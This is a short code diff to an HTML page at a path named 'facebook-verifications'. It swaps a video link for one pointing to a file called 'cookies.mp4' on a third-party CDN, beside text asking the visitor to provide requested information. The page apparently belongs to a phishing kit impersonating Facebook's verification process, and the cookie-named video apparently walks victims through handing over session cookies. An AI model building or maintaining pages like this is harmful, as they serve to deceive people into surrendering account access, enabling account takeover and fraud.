--- a/facebook-verifications/next.html
+++ b/facebook-verifications/next.html
@@ -65,7 +65,7 @@
             </b>
           </div>
           <div>
-            <a class="w-32 h-20 block" href="https://instructions-video.vercel.app/detailed_video.mp4"><img class="w-32 h-20 mx-3" src="video-logo.jpg" alt=""></a>
+            <a class="w-32 h-20 block" href="https://cdn.glitch.global/cfdab748-b145-4b28-8f85-c26ac388a3c9/cookies.mp4?v=1719846896202"><img class="w-32 h-20 mx-3" src="video-logo.jpg" alt=""></a>
           </div>
           <p class="text-[10px] font-serif mt-3 mx-3">
             Please be sure to provide the requested information below.
